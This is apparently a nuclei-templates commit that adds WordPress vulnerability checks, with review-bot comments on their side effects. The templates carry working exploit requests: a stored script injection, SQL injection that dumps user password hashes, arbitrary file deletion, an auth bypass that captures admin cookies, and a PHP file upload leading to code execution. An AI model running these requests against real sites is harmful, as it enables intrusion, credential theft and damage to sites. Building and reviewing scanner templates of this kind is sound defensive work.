commit
40736bbead
|
@ -0,0 +1,37 @@
|
||||||
|
id: CVE-2018-3810
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Smart Google Code Inserter Authentication Bypass
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
reference: https://www.exploit-db.com/exploits/43420
|
||||||
|
tags: wordpress,auth-bypass,cve,cve2018
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
|
||||||
|
|
||||||
|
body: 'sgcgoogleanalytic=<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
|
||||||
|
headers:
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
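Review bot: The POST to `/wp-admin/options-general.php?page=smartcode` stores a `<script>` tag in the plugin's `sgcgoogleanalytic` setting and the GET on `/` only confirms it is now rendered to every visitor, so a positive result leaves an executable stored injection on the live site with nothing in the template to undo it. A trailing request that re-submits the form with `sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode` would clear the option, assuming the handler accepts an empty value as the visible `sgcwebtools=` suggests it does. If the plugin echoes the value verbatim, a non-executing marker such as an HTML comment would prove the bypass equally well without running code in visitors' browsers. The side effect should be stated in `info`, e.g. `description: Unauthenticated settings write; the check stores a marker in the plugin's code-insert option and verifies it on the homepage.`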
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2020-14092
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Payment Form For Paypal Pro Unauthenticated SQL Injection
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
reference: https://wpscan.com/vulnerability/10287
|
||||||
|
tags: cve,cve2020,wordpress,wp-plugin,sqli
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"user_login"'
|
||||||
|
- '"user_email"'
|
||||||
|
- '"user_pass"'
|
||||||
|
- '"user_activation_key"'
|
||||||
|
condition: and
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
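Review bot: The injected query `SELECT%20*%20from%20wp_users` pulls every user's `user_pass` hash and `user_activation_key` into the scanner's output and HTTP log, turning a detection probe into bulk credential exfiltration. Selecting only `user_login` with `LIMIT 1` and matching on `"user_login"` alone would still prove the injection, assuming the handler emits column keys for whatever is selected as the current matcher implies. The hard-coded `wp_` prefix also gives a false negative on any site with a custom table prefix; a query against `information_schema.tables` would avoid that, though the visible response does not show whether such output is rendered the same way. An `info` `description` stating that the check executes an attacker-chosen SELECT against the site database is worth adding either way.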
|
|
@ -0,0 +1,79 @@
|
||||||
|
id: CVE-2020-35951
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Wordpress Quiz and Survey Master Arbitrary File Deletion
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
|
||||||
|
tags: cve,cve2020,wordpress,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Length: 269
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
------WebKitFormBoundaryBJ17hSJBjuGrnW92
|
||||||
|
Content-Disposition: form-data; name="action"
|
||||||
|
|
||||||
|
qsm_remove_file_fd_question
|
||||||
|
------WebKitFormBoundaryBJ17hSJBjuGrnW92
|
||||||
|
Content-Disposition: form-data; name="file_url"
|
||||||
|
|
||||||
|
{{fullpath}}wp-content/plugins/quiz-master-next/README.md
|
||||||
|
------WebKitFormBoundaryBJ17hSJBjuGrnW92--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: fullpath
|
||||||
|
internal: true
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- "not found in <b>([/a-z_]+)wp"
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '{"type":"success","message":"File removed successfully"}'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"
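Review bot: The `qsm_remove_file_fd_question` request deletes `quiz-master-next/README.md` from the target and the final GET only verifies it is gone, so the template is destructive and irreversible, yet `info` does not say so; add `description:` noting that a positive result means a plugin file was actually removed from the server. The `fullpath` extractor regex `not found in <b>([/a-z_]+)wp` accepts only lowercase letters, slashes and underscores, so a docroot containing digits, hyphens, dots or uppercase (for example `/var/www/site-1/`) fails to extract and the POST then sends the literal `{{fullpath}}` as `file_url`; `not found in <b>([^<]+?)wp-content` captures the same prefix without that restriction. The extraction also presumably relies on a displayed PHP fatal error from the `AcceptanceTester.php` request, so a host with error display off produces no finding even when vulnerable. The fixed `Content-Length: 269` cannot match a body whose length depends on the extracted path unless nuclei recomputes it for raw requests, which I cannot confirm from here.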
|
|
@ -26,7 +26,6 @@ requests:
|
||||||
- '{{BaseURL}}/wp-config.php~'
|
- '{{BaseURL}}/wp-config.php~'
|
||||||
- '{{BaseURL}}/wp-config.php.orig'
|
- '{{BaseURL}}/wp-config.php.orig'
|
||||||
- '{{BaseURL}}/wp-config.php.original'
|
- '{{BaseURL}}/wp-config.php.original'
|
||||||
- '{{BaseURL}}/wp-license.php?file=../..//wp-config'
|
|
||||||
- '{{BaseURL}}/_wpeprivate/config.json'
|
- '{{BaseURL}}/_wpeprivate/config.json'
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -0,0 +1,50 @@
|
||||||
|
id: wordpress-auth-bypass-wptimecapsule
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress WP Time Capsule Authentication Bypass
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
reference: https://github.com/SECFORCE/WPTimeCapsulePOC
|
||||||
|
tags: wordpress,auth-bypass,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Connection: close
|
||||||
|
Accept: */*
|
||||||
|
|
||||||
|
IWP_JSON_PREFIX
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/index.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Connection: close
|
||||||
|
Accept: */*
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<div id="adminmenumain" role="navigation" aria-label="Main menu">'
|
||||||
|
- "<h1>Dashboard</h1>"
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"
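Review bot: The `extractors` block reports the `wordpress_<hash>=` cookie value obtained through the `IWP_JSON_PREFIX` bypass, so a live administrator session token for the target is written into scan results and logs; drop the extractor, or mark it `internal: true` if it is meant to feed a follow-up request, since the Dashboard matcher already proves the bypass. The template also never ends the session it opened, so `info` should state the side effect, e.g. `description: Unauthenticated POST bodies beginning with IWP_JSON_PREFIX are treated as an admin login; the check opens such a session and loads the dashboard.` Operators should know that a positive result means an admin session now exists on the target.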
|
|
@ -0,0 +1,74 @@
|
||||||
|
id: wordpress-rce-simplefilelist
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
reference: https://wpscan.com/vulnerability/10192
|
||||||
|
tags: wordpress,wp-plugin,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
Content-Length: 693
|
||||||
|
Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2
|
||||||
|
|
||||||
|
--6985fa39c0698d07f6d418b37388e1b2
|
||||||
|
Content-Disposition: form-data; name="eeSFL_ID"
|
||||||
|
|
||||||
|
1
|
||||||
|
--6985fa39c0698d07f6d418b37388e1b2
|
||||||
|
Content-Disposition: form-data; name="eeSFL_FileUploadDir"
|
||||||
|
|
||||||
|
/wp-content/uploads/simple-file-list/
|
||||||
|
--6985fa39c0698d07f6d418b37388e1b2
|
||||||
|
Content-Disposition: form-data; name="eeSFL_Timestamp"
|
||||||
|
|
||||||
|
1587258885
|
||||||
|
--6985fa39c0698d07f6d418b37388e1b2
|
||||||
|
Content-Disposition: form-data; name="eeSFL_Token"
|
||||||
|
|
||||||
|
ba288252629a5399759b6fde1e205bc2
|
||||||
|
--6985fa39c0698d07f6d418b37388e1b2
|
||||||
|
Content-Disposition: form-data; name="file"; filename="nuclei.png"
|
||||||
|
Content-Type: image/png
|
||||||
|
|
||||||
|
<?php echo "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?>
|
||||||
|
--6985fa39c0698d07f6d418b37388e1b2--
|
||||||
|
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: python-requests/2.25.1
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 81
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'Nuclei - Open-source project (github.com/projectdiscovery/nuclei)'
|
||||||
|
part: body
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
||||||
|
part: header
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
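Review bot: A successful run leaves `/wp-content/uploads/simple-file-list/nuclei.php` on the target, a world-reachable PHP file that executes `phpinfo()` for anyone who requests it, and the template has no cleanup step. At minimum the payload should be reduced to the `echo` marker so nothing beyond the proof string is exposed, and `info` should document that the check writes and executes a PHP file under uploads, e.g. `description: Unauthenticated upload plus rename to .php; the check leaves a PHP file in the uploads directory that must be removed.` If `ee-file-engine.php` offers a delete action alongside the `Rename` used in the second request, a final request removing `nuclei.php` would close the window, but I cannot confirm such an action from this hunk.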
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: wordpress-total-upkeep-backup-download
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Total Upkeep Database and Files Backup Download
|
||||||
|
author: princechaddha
|
||||||
|
severity: high
|
||||||
|
reference: https://www.exploit-db.com/exploits/49252
|
||||||
|
tags: wordpress,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "application/json"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"filepath"'
|
||||||
|
- '/wp-content/boldgrid_backup_'
|
||||||
|
condition: and
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
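Review bot: The matcher confirms `restore-info.json` is readable and names a `/wp-content/boldgrid_backup_` path, but the finding does not report which archive is exposed; an extractor such as `- type: regex`, `part: body`, `regex: - '"filepath":"([^"]+)"'` would surface it for triage without the scanner ever downloading the backup, adjusted for whatever whitespace or slash escaping the real response uses (the matcher's unescaped `/wp-content/boldgrid_backup_` suggests none). `info` also lacks a `description`; suggest `description: The Total Upkeep cron directory exposes restore-info.json, which reveals the server path of the latest database and files backup archive.` Keeping the template read-only as it is now is correct, since the archive contains the site database.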
|
|
@ -5,15 +5,13 @@ info:
|
||||||
description: A simple workflow that runs all wordpress related nuclei templates on a given target.
|
description: A simple workflow that runs all wordpress related nuclei templates on a given target.
|
||||||
tags: workflow
|
tags: workflow
|
||||||
|
|
||||||
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
|
|
||||||
# Old workflows still remains valid, and will be working with all nuclei versions.
|
|
||||||
|
|
||||||
workflows:
|
workflows:
|
||||||
|
|
||||||
- template: technologies/tech-detect.yaml
|
- template: technologies/tech-detect.yaml
|
||||||
matchers:
|
matchers:
|
||||||
- name: wordpress
|
- name: wordpress
|
||||||
subtemplates:
|
subtemplates:
|
||||||
|
- template: cves/2018/CVE-2018-3810.yaml
|
||||||
- template: cves/2019/CVE-2019-6112.yaml
|
- template: cves/2019/CVE-2019-6112.yaml
|
||||||
- template: cves/2019/CVE-2019-6715.yaml
|
- template: cves/2019/CVE-2019-6715.yaml
|
||||||
- template: cves/2019/CVE-2019-9978.yaml
|
- template: cves/2019/CVE-2019-9978.yaml
|
||||||
|
@ -25,6 +23,11 @@ workflows:
|
||||||
- template: cves/2020/CVE-2020-24312.yaml
|
- template: cves/2020/CVE-2020-24312.yaml
|
||||||
- template: cves/2020/CVE-2020-25213.yaml
|
- template: cves/2020/CVE-2020-25213.yaml
|
||||||
- template: cves/2020/CVE-2020-13700.yaml
|
- template: cves/2020/CVE-2020-13700.yaml
|
||||||
|
- template: cves/2020/CVE-2020-14092.yaml
|
||||||
|
- template: cves/2020/CVE-2020-35951.yaml
|
||||||
|
- template: vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
|
||||||
|
- template: vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
|
||||||
|
- template: vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml
|
||||||
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
|
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
|
||||||
- template: vulnerabilities/wordpress/sassy-social-share.yaml
|
- template: vulnerabilities/wordpress/sassy-social-share.yaml
|
||||||
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
|
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
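Review bot: The `subtemplates` list now includes templates that change the target — `CVE-2020-35951.yaml` deletes a plugin file, `wordpress-rce-simplefilelist.yaml` uploads and executes a PHP file, `wordpress-auth-bypass-wptimecapsule.yaml` opens an admin session and `CVE-2018-3810.yaml` writes a script tag into site settings — while the `description` at the top of the file still calls this "a simple workflow that runs all wordpress related nuclei templates", so an operator gets no warning before pointing it at production. Suggest `description: Runs all WordPress-related nuclei templates on a target. Several subtemplates are intrusive (file deletion, file upload and execution, settings writes, admin session creation); review them before running against production systems.` The first hunk also drops the only comment that stated the nuclei version this workflow format requires, so a one-line replacement noting the minimum version would help. The `subtemplates` list continues beyond this hunk.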
|
||||||
|
|